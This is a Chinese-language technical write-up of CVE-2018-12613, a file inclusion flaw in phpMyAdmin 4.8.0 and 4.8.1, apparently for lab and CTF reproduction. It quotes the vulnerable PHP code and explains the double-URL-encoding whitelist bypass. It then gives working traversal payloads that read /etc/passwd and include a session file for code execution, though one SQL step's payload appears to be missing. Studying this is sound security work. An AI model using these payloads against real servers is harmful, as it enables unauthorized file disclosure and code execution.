CVE-2018-12613 (phpmyadmin 4.8.1 远程文件包含漏洞)
phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)
phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。
0x01 影响范围
phpMyAdmin 4.8.0 and 4.8.1 are affected.
0x02 原理
漏洞代码
$target_blacklist = array (
'import.php', 'export.php'
);
// If we have a valid target, let's load that script instead
if (! empty($_REQUEST['target'])
&& is_string($_REQUEST['target']) // 得是字符串
&& ! preg_match('/^index/', $_REQUEST['target']) // 不能以index开头
&& ! in_array($_REQUEST['target'], $target_blacklist) // 不能是import.php,export.php
&& Core::checkPageValidity($_REQUEST['target']) // 返回为true
) {
include $_REQUEST['target'];
exit;
}
对传入参数target进行限制,存在文件包含的危险,
只要绕过checkPageValidity函数,就能实现文件包含。
checkPageValidity函数代码:
public static function checkPageValidity(&$page, array $whitelist = [])
{
if (empty($whitelist)) {
$whitelist = self::$goto_whitelist;
}
if (! isset($page) || !is_string($page)) {
return false;
}
if (in_array($page, $whitelist)) {
return true;
}
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
return false;
}
- 如果传入的target在
$whitelist = self::$goto_whitelist;的白名单里,返回true 白名单有
'db_datadict.php',
'db_sql.php',
'db_events.php',
'db_export.php',
'db_importdocsql.php',
'db_multi_table_query.php',
'db_structure.php',
'db_import.php',
'db_operations.php',
'db_search.php',
'db_routines.php',
'export.php',
'import.php',
'index.php',
'pdf_pages.php',
'pdf_schema.php',
'server_binlog.php',
'server_collations.php',
'server_databases.php',
'server_engines.php',
'server_export.php',
'server_import.php',
'server_privileges.php',
'server_sql.php',
'server_status.php',
'server_status_advisor.php',
'server_status_monitor.php',
'server_status_queries.php',
'server_status_variables.php',
'server_variables.php',
'sql.php',
'tbl_addfield.php',
'tbl_change.php',
'tbl_create.php',
'tbl_import.php',
'tbl_indexes.php',
'tbl_sql.php',
'tbl_export.php',
'tbl_operations.php',
'tbl_structure.php',
'tbl_relation.php',
'tbl_replace.php',
'tbl_row_action.php',
'tbl_select.php',
'tbl_zoom_select.php',
'transformation_overview.php',
'transformation_wrapper.php',
'user_password.php'
-
这是截取传入参数“?”前的字符串,如果截取后的文件名在白名单里,返回true
$_page = mb_substr( $page, 0, mb_strpos($page . '?', '?') );
-
对输入参数进行url解码,再进行截取,判断是否在白名单里,这里就存在构造payload
$_page = urldecode($page); $_page = mb_substr( $_page, 0, mb_strpos($_page . '?', '?') );
payload:?target=db_sql.php%253f/../../../../../../xxxx
服务器默认会进行一次url解码,那么%253f就会被解码为%3f,再进行url二次解码后为"?",在进行截取时是db_sql.php?/../../../../../../xxxx?,这样只会截取db_sql.php,是白名单,但最后文件包含的target参数内容是db_sql.php%3f/../../../../../../xxxx ,包含的文件为../../../../../../xxxx
0x03 漏洞利用
- 检测是否存在漏洞(不唯一)
payload:http://your-ip:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
若passwd文件被读取,则存在漏洞。
- 查询数据库路径
show global variables like "%datadir%"
- 通过包含session临时文件来实现
执行SELECT '';
查看session值
payload:?target=db_sql.php%253f/../../../../../../../../tmp/sess_a20b482402ef018b8e711c7d22891c7b
执行成功
0x04 环境复现
-
vulhub
-
buuoj:[GWCTF 2019]我有一个数据库
0x05 参考
https://github.com/vulhub/vulhub/blob/master/phpmyadmin/CVE-2018-12613/README.zh-cn.md